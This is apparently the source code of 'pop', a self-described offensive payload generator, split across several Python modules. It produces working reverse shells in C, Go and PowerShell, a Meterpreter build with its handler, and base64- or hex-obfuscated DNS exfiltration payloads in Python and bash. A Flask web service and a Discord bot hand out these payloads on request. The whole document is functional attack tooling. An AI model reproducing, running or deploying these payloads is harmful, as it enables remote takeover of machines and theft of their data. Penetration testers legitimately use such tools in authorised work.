#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

import os
from PIL import Image


USAGE = 'W H content'
NARGS = [3, 0]
LANG = 'png'
EXEC = ''

pl = ''


def g(s, args, dst, url):
    txt = ' '.join(args[2:]).strip().encode()

    img = os.path.join(dst, 'img.png')
    png = Image.new('RGB', (int(args[0]), int(args[1])), color='black')
    png.save(img)

    with open(img, 'rb') as fp:
        png = fp.read()
    with open(img, 'wb') as fp:
        fp.write(png + txt)

    return url + 'img.png'




import getopt
import ipaddress
import os


USAGE = 'ip port'
NARGS = [2, 2]
LANG = 'go'

EXEC = '''
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_http
set lhost 0.0.0.0
set lport ARG2
run -j
'''.strip()


pl = '''
msfvenom -a x64 -p windows/x64/meterpreter_reverse_http LHOST=ARG1 LPORT=ARG2 -f exe -o ./msf.exe
'''.strip()


def g(_, args, dst, url):
    try:
        _ = ipaddress.ip_address(args[0])
    except Exception as e:
        raise Exception('Not an IP address')
    try:
        lport = int(args[1])
    except Exception as e:
        raise Exception('Invalid number')
    if 1 > lport or 65535 < lport:
        raise Exception('Invalid port number')

    s = pl.replace('ARG1', args[0]).replace('ARG2', str(lport))
    print(s)

    out = 'rh-{}-{}.exe'.format(args[0], lport)
    targs = []
    with open('{}/build.sh'.format(dst), 'w') as fp:
        fp.write('\n'.join([
            'cd $(dirname -- "$0")',
            '{} 2>/dev/null'.format(s),
            'cp -R /usr/src/morbol/* .',
            'python3 ./morbol.py ./msf.exe ./{} >/dev/null'.format(out),
        ]))

    os.system('/bin/sh "{}/build.sh"'.format(dst))

    targs += ['build.sh', 'msf.exe', out]
    return '\n'.join([url + f for f in targs])



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

import base64


USAGE = 'domain cmd [arg...]'
NARGS = [2, 0]
LANG = 'sh'
EXEC = "python -c 'PAYLOAD'"

pl = ''


def g(s, args, _1, _2):
    cmd = ' '.join([a.replace('\\', '\\\\').replace('"', '\\"') for a in args[1:]])

    py = '''
import binascii,os,socket;o=binascii.hexlify(os.popen("CMD").read().encode()).decode()
for i in range(0,len(o),62):
 try:
  socket.gethostbyname("{}.{}.ARG1".format(i,o[i:i+62]))
 except:
  pass
    '''.replace('ARG1', args[0]).replace('CMD', cmd)

    return 'exec(__import__("base64").b64decode("{}").decode())'.format(base64.b64encode(py.encode()).decode())



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

USAGE = 'domain cmd [arg...]'
NARGS = [2, 0]
LANG = 'sh'
EXEC = "bash -c 'PAYLOAD'"

pl = '''
i=0;ARG2ARGN|od -vtx1 -An|(xargs -n63 printf %s;echo)|fold -w62|while read p;do </dev/tcp/$i.$p.ARG1/&i=$((i+1));done
'''



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

import ipaddress
import os


USAGE = 'ipaddr port'
NARGS = [2, 2]
LANG = 'c'
EXEC = ''

pl = '''
int main() {
        int sk;
        struct sockaddr_in sin;

        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port   = htons(ARG2);
        if (1 != inet_pton(AF_INET, "ARG1", &sin.sin_addr)) {
                perror("inet_pton");
                return 1;
        }

        if (0 > (sk = socket(AF_INET, SOCK_STREAM, 0))) {
                perror("socket");
                return 1;
        }

        if (0 > connect(sk, (struct sockaddr*)&sin, sizeof(sin))) {
                perror("connect");
                return 1;
        }

        dup2(sk, 0);
        dup2(sk, 1);
        dup2(sk, 2);

        execlp("C:\\\\windows\\\\system32\\\\cmd.exe", "cmd", 0);
        execlp("/bin/sh", "sh", 0);
        perror("execlp");
}
'''.strip()


def g(s, args, dst, url):
    try:
        ipaddress.ip_address(args[0])
    except ValueError:
        raise Exception('Invalid IP address')

    with open('{}/src.c'.format(dst), 'w') as fp:
        fp.write(s)

    with open('{}/build.sh'.format(dst), 'w') as fp:
        fp.write('\n'.join([
            'cd $(dirname -- "${0}")',
            'gcc -g -Os -static -nostdlib -nostdinc -fno-pie -no-pie -mno-red-zone \\',
            '    -fno-omit-frame-pointer -pg -mnop-mcount \\',
            '    -o src.com.dbg src.c -fuse-ld=bfd -Wl,-T,/usr/src/cosmopolitan/ape.lds \\',
            '    -include /usr/src/cosmopolitan/cosmopolitan.h /usr/src/cosmopolitan/crt.o /usr/src/cosmopolitan/ape.o /usr/src/cosmopolitan/cosmopolitan.a',
            'objcopy -S -O binary src.com.dbg src.com',
        ]))

    os.system('/bin/sh {}/build.sh 2>/dev/null'.format(dst))

    return '\n'.join([url + t for t in ['src.c', 'src.com', 'src.com.dbg', 'build.sh']])



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
# TODO ip -> integer

USAGE = 'host port'
NARGS = [2, 2]
LANG = 'ps'
EXEC = """
evil-winrm> iex(iwr -useb ARG1/pl.ps1)
evil-winrm> iex((new-object net.webclient).downloadstring('http://ARG1/pl.ps1'))
evil-winrm> PAYLOAD
"""


pl = '''
$VAR1=(New-Object Net.Sockets.TCPClient("ARG1",ARG2)).GetStream();[byte[]]$VAR2=0..255|%{0};while(($VAR3=$VAR1.Read($VAR2,0,$VAR2.Length))-ne0){$VAR4=(New-Object -TypeName Text.ASCIIEncoding).GetString($VAR2,0,$VAR3);$VAR6=([text.encoding]::ASCII).GetBytes($((iex($VAR4))2>&1|Out-String));$VAR1.Write($VAR6,0,$VAR6.Length);$VAR1.Flush()}
'''



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

import getopt
import os


TARGETS = {
    'windows': ['amd64', '386'],
    'linux': ['amd64', '386', 'arm64', 'arm'],
    'solaris': ['amd64'],
    'netbsd': ['386', 'amd64', 'arm'],
    'openbsd': ['386', 'amd64', 'arm'],
    'freebsd': ['386', 'amd64', 'arm'],
}


USAGE = 'host port os-arch'
NARGS = [3, 3]
LANG = 'go'
EXEC = ''


pl = '''
package main

import (
        "bufio"
        "fmt"
        "net"
        "os"
        "os/exec"
        "runtime"
        "strings"
)

func main() {{
    cmd := "sh";
    arg := "-c";
    if runtime.GOOS == "windows" {
        cmd = "cmd";
        arg = "/c";
    }
        conn, _ := net.Dial("tcp", "ARG1:ARG2")
        for {{
                message, _ := bufio.NewReader(conn).ReadString('\\n')
                if message == "exit\\n" {{
                        os.Exit(0);
                }}
                out, err := exec.Command(cmd, arg, strings.TrimSuffix(message, "\\n")).Output()
                if err != nil {{
                        fmt.Fprintf(conn, "%s\\n",err)
                }}
                fmt.Fprintf(conn, "%s\\n",out)
        }}
}}
'''.strip()


def g(s, args, dst, url):
    with open('{}/src.go'.format(dst), 'w') as fp:
        fp.write(s)

    # mkdir for each targets
    targs = []
    with open('{}/build.sh'.format(dst), 'w') as fp:
        fp.write('cd $(dirname -- "${0}")\n')
        for tos in TARGETS:
            for arch in TARGETS[tos]:
                fn = '{}-{}'.format(tos, arch)
                if args[2] != fn:
                    continue
                fp.write('GOOS={} GOARCH={} go build -ldflags "-w -s" -o {} src.go'.format(tos, arch, fn))
                fp.write('\n')
                targs += [fn]

    os.system('/bin/sh "{}/build.sh"'.format(dst))

    pl = ['src.go', 'build.sh'] + targs
    return '\n'.join([url + e for e in pl])



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

from pop import p


def g(*args, **kwargs):
    if 2 > len(args):
        raise Exception('not enough arguments')

    t = getattr(p, args[0])
    if t is None:
        raise Exception('unknown payload type: {}'.format(args[0]))
    if args[1] not in t:
        raise Exception('unknown generator type: {}/{}'.format(*args[:2]))

    r = ''
    try:
        r = t[args[1]].g(args[2:], **kwargs).strip()
    except Exception as e:
        raise e

    return r


def rndstr(n=4):
    from random import choice
    from string import ascii_letters, digits

    r = choice(ascii_letters)

    for _ in range(n - 1):
        r += choice(ascii_letters + digits)

    return r


def main(app, *cargs):
    import os
    from pop.__main__ import main

    r = rndstr(8)
    d = os.path.join(app.config['POP_DESTDIR'], r)
    os.mkdir(d)
    u = os.environ['POP_URL'] + '/p/' + r + '/'

    return main(*cargs, dstdir=d, url=u)


def create_app():
    from flask import Flask, render_template, request, send_from_directory
    from os import environ

    app = Flask(__name__)
    app.config['POP_DESTDIR'] = environ['POP_DESTDIR']
    app.config['POP_URL'] = environ['POP_URL']

    @app.route('/')
    def index():
        return render_template('index.html')

    @app.route('/s/<path:path>')
    def spath(path):
        return send_from_directory('static', path)

    @app.route('/p/<path:path>')
    def ppath(path):
        return send_from_directory(app.config['POP_DESTDIR'], path)

    @app.route('/g', methods=['POST'])
    def gen():
        js = request.get_json(force=True)
        try:
            if type(js['c']) is list:
                return {'r': main(app, js['c'])}
            elif type(js['c']) is str:
                return {'r': main(app, js['c'].split())}
            raise Exception('invalid argument')
        except Exception as e:
            return {'error': True, 'message': str(e)}

        return {'error': True, 'message': 'this should never happened'}

    return app


def create_bot(update_commands=False):
    import pop
    from os import environ

    from flask_discord_interactions import DiscordInteractions, CommandOptionType

    app = pop.create_app()
    discord = DiscordInteractions(app)
    app.config['DISCORD_CLIENT_ID'] = environ['DISCORD_CLIENT_ID']
    app.config['DISCORD_PUBLIC_KEY'] = environ['DISCORD_PUBLIC_KEY']
    app.config['DISCORD_CLIENT_SECRET'] = environ['DISCORD_CLIENT_SECRET']

    @discord.command(options=[{
        'name': 'args',
        'description': 'arguments to pass to pop',
        'type': CommandOptionType.STRING,
        'required': False,
    }])
    def pop(ctx, args=''):
        "generate a payload"
        try:
            o = main(app, args.split())
        except Exception as e:
            o = str(e)

        return '```\n{}\n```'.format(o.strip())

    discord.set_route('/b/d')

    if update_commands:
        discord.update_commands(guild_id=environ['DISCORD_GUILD_ID'])

    return app



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

import pop


def ls(name=None):
    o = ''

    o += '=> generators\n'
    for k in dir(pop.p):
        if '_' in k or 'enc' == k:
            continue
        if name is not None and k != name:
            continue

        t = getattr(pop.p, k).keys()
        if name is None:
            o += '  {:6}'.format(k)
        o += ' '.join(sorted(t)) + '\n'

    # TODO list supported encoders
    if name is not None and name:
        return o[:-1]

    o += '\n=> encoders\n'
    for k in pop.p.enc:
        if name is not None and k != name:
            continue

        t = getattr(pop.p, 'enc')[k].keys()
        if name is None:
            o += '  {:6}'.format(k)
        o += ' '.join(sorted(t)) + '\n'

    return o


def usage():
    u = 'pop [-EHhl] [-e encoder[,...]] type gen [arg...]'
    return 'usage: {}'.format(u)


def manpage():
    return '''

  pop is an offensive payload generator designed for portability,
  minimalism and efficiency.

    https://gitlab.com/pgregoire/pop/

USAGE

  {}

  -E    Add example usage to output.
  -H    Display this help page.
  -h    Display a small usage line.
  -l    List generators and encoders.
  -e    A comma-separated list of encoders to use.
        (not all encoders are supported by all languages)

  type  The type of generators to use.

              bt  Bind TCP shells
              img Injected images generators
              ns  DNS query generators (simple pokes)
              rc  Remote command executions (simple)
              rh  Remove HTTP(S) shells
              rt  Reverse TCP shells
              ws  Web shells
              xd  DNS exfiltration payloads

  gen   The specific generator to use.

  [arg...]  Arguments to provide to the generator (if any).

EXAMPLES

  Generate a reverse TCP shell Python payload to connect back to
  port 4444 on host example.com.

    pop rt py example.com 4444

  Generate a base64-encoded payload that runs "cat /etc/passwd" and
  uses ping to exfiltrate the output to the unique.example.com domain.

    pop -e b64 xd ping unique.example.com cat /etc/passwd
    '''.format(usage())[1:]


def main(args, dstdir=None, url=None):
    from os import environ, getcwd
    from getopt import getopt, GetoptError

    opts, args = getopt(args, 'EHd:e:hl')

    o_encs = ''
    o_noex = True
    o_dstdir = getcwd()
    o_url = ''
    for k, v in opts:
        if '-E' == k:
            o_noex = False
        elif '-H' == k:
            return manpage()
        elif '-d' == k:
            o_dstdir = v
        elif '-h' == k:
            return usage()
        elif '-l' == k:
            return ls()
        elif '-e' == k:
            o_encs = v

    # cli: user, flask: server
    o_dstdir = dstdir if dstdir else o_dstdir
    o_url = url if url else o_url

    if 0 == len(args):
        raise Exception(usage())
    if 1 == len(args):
        if args[0] not in dir(pop.p):
            raise Exception('error: unknown payload type ({})'.format(args[0]))
        return ls(args[0])

    if args[0] not in dir(pop.p):
        raise Exception('error: unknown payload type ({})'.format(args[0]))
    if args[1] not in getattr(pop.p, args[0]):
        raise Exception('error: unknown generator ({}/{})'.format(args[0], args[1]))

    m = getattr(pop.p, args[0])[args[1]]
    # if less than minargs or greater than maxargs
    if len(args[2:]) < m.nargs[0] or (len(args[2:]) > m.nargs[1] and m.nargs[1] >= m.nargs[0]):
        o = 'error: missing arguments\n'
        o += 'usage: {} {} {}'.format(args[0], args[1], m.usage)
        raise Exception(o)

    e = [e for e in o_encs.split(',') if e.strip()]
    pl = pop.g(*args, encs=e, dstdir=o_dstdir, url=o_url)
    if getattr(m, 'EXEC') and not o_noex:
        e = getattr(m, 'EXEC').strip()
        if e != 'PAYLOAD':
            e = e.replace('PAYLOAD', pl)
            e = m.repl(args[2:], e)
            pl += '\n\nexample:\n' + e

    return pl


if '__main__' == __name__:
    import sys

    try:
        print(main(sys.argv[1:]))
    except Exception as e:
        sys.stderr.write('{}\n'.format(e))
        exit(1)

    exit(0)



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

from glob import glob
from os.path import basename, dirname


class Encoder():
    def __init__(self, name):
        from importlib import import_module
        self.m = import_module('.{}'.format(name), __name__)
        del globals()[name]

    def __call__(self, pl):
        return self.m.enc(pl)


class Module():
    def rndstr(self, n=4):
        from random import choice
        from string import ascii_letters, digits

        r = choice(ascii_letters)

        for _ in range(n - 1):
            r += choice(ascii_letters + digits)

        return r

    def varrepl(self, s):
        for i in range(32):
            k = 'VAR{}'.format(i)
            s = s.replace(k, self.rndstr())

        return s

    def randnum(self):
        from random import random
        return int(random() * 10000)

    def numrepl(self, s):
        for i in range(32):
            k = 'NUM{}'.format(i)
            s = s.replace(k, str(self.randnum()))
        return s

    def argrepl(self, s, ARGS):
        args = ARGS[::]
        for i in range(1, 10):
            k = 'ARG{}'.format(i)
            if k not in s:
                continue
            p = ARGS[i - 1]
            if hasattr(self.pymod, 'tr'):
                p = self.pymod.tr(p, i)
            s = s.replace(k, p)

        if 'ARGN' in s:
            if 0 != len(ARGS[self.pymod.NARGS[0]:]):
                args = ARGS[self.pymod.NARGS[0]:]
                if hasattr(self.pymod, 'tr'):
                    args = [self.pymod.tr(a, 1) for a in args]
                s = s.replace('ARGN', ' ' + ' '.join(args))
            else:
                s = s.replace('ARGN', '')

        return s

    def repl(self, args, pl=None):
        pl = pl if pl else self.pymod.pl
        return self.numrepl(self.varrepl(self.argrepl(pl, args)))

    def __init__(self, name):
        from importlib import import_module
        keys = ['USAGE', 'LANG', 'NARGS', 'EXEC', 'pl']

        m = import_module('.{}'.format(name), __name__)
        assert(all([k for k in keys if getattr(m, k)]))
        del globals()[name]
        self.pymod = m

    def checkargs(self, a):
        n = self.pymod.NARGS
        if len(a) < n[0]:
            return -1
        elif 0 != n[1] and len(a) > n[1]:
            return 1
        return 0

    def __getattr__(self, k):
        r = None
        if k in dir(self.pymod):
            r = getattr(self.pymod, k)
        if k.upper() in dir(self.pymod):
            r = getattr(self.pymod, k.upper())

        if 'g' == k:
            if r is None:
                def r(args, encs=[], dstdir=None, url=None):
                    if 0 > self.checkargs(args):
                        raise Exception('not enough arguments')
                    elif 0 < self.checkargs(args):
                        raise Exception('too many arguments')

                    t = self.repl(args)
                    for e in encs:
                        if self.pymod.LANG not in globals()['enc']:
                            raise Exception('Language has no encoder')
                        if e not in globals()['enc'][self.pymod.LANG]:
                            raise Exception('No encoder "{}" for language "{}"'.format(e, self.pymod.LANG))
                        t = globals()['enc'][self.pymod.LANG][e](t)
                        t = self.varrepl(t)
                    return t
            else:
                # atm, binaries don't have encoders
                def r(args, encs=[], dstdir=None, url=None):
                    t = self.repl(args)
                    return self.pymod.g(t, args, dstdir, url)

        return r


for f in glob('{}/*.py'.format(dirname(__file__))):
    f = basename(f)[:-3]
    if '__init__' == f:
        continue

    n = f.split('-')[0]
    if n not in globals():
        globals()[n] = {}

    if 'enc' == n:
        n = f.split('-')[1]
        if n not in globals()['enc']:
            globals()['enc'][n] = {}
        globals()['enc'][n][f.split('-')[2]] = Encoder(f)

    else:
        n = '-'.join(f.split('-')[1:])
        globals()[f.split('-')[0]][n] = Module(f)


del globals()['glob']
del globals()['basename']
del globals()['dirname']
del globals()['Encoder']
del globals()['Module']
del globals()['f']
del globals()['n']



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

def enc(s):
    _ = "f(){ printf %b $(printf '\\\\\\\\\\\\%03o' $@); };eval $(echo "
    _ += s.encode().hex()
    _ += '|sed "s|\\(..\\)|&\\n|g"|grep .|while read x;do f "0x$x";done|sed "s|.\\(.\\)|\\1|g")'
    return _



#
# pop is an offensive payload generator
# Copyright 2021-2022 Philippe Grégoire <git@pgregoire.xyz>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#

import getopt
import os
import shlex


TARGETS = {
    'windows': ['amd64'],
    'linux': ['amd64'],
}


USAGE = 'cmd [arg...] os-arch'
NARGS = [2, 0]
LANG = 'nim'
EXEC = ''


pl = '''
import osproc

const po: set[ProcessOption] = {poStdErrToStdOut, poUsePath}
when defined(windows):
  const sh  = "cmd"
  const arg = "/c"
else:
  const sh  = "sh"
  const arg = "-c"

try:
    execProcess(sh, args=[arg,"CMD"], options=po)
except:
    raise
'''.strip()


def g(_, args, dst, url):
    # payload was not formatted
    cmd = ' '.join([a.replace('\\', '\\\\').replace('"', '\\"') for a in args[:-1]])
    s = pl.replace('CMD', cmd)

    with open('{}/src.nim'.format(dst), 'w') as fp:
        fp.write(s)

    targs = []
    with open('{}/build.sh'.format(dst), 'w') as fp:
        fp.write('cd $(dirname -- "${0}")\n')
        for tos in TARGETS:
            for arch in TARGETS[tos]:
                fn = '{}-{}'.format(tos, arch)
                if args[1] != fn:
                    continue
                o, c, r = '--os:{}'.format(tos), arch, 'release'
                if 'windows' == tos:
                    r = 'mingw'
                    o = ''
                fp.write('nim c -d:{} --cpu:{} {} -o:{} src.nim 2>/dev/null >/dev/null'.format(r, c, o, fn))
                fp.write('\n')
                fp.write('strip -s {}*\n'.format(fn))
                targs += [fn + '{}'.format('.exe' if 'windows' == tos else '')]

    if [] == targs:
        return

    os.system('/bin/sh "{}/build.sh"'.format(dst))

    return '\n'.join([url + f for f in ['src.nim', 'build.sh'] + targs])
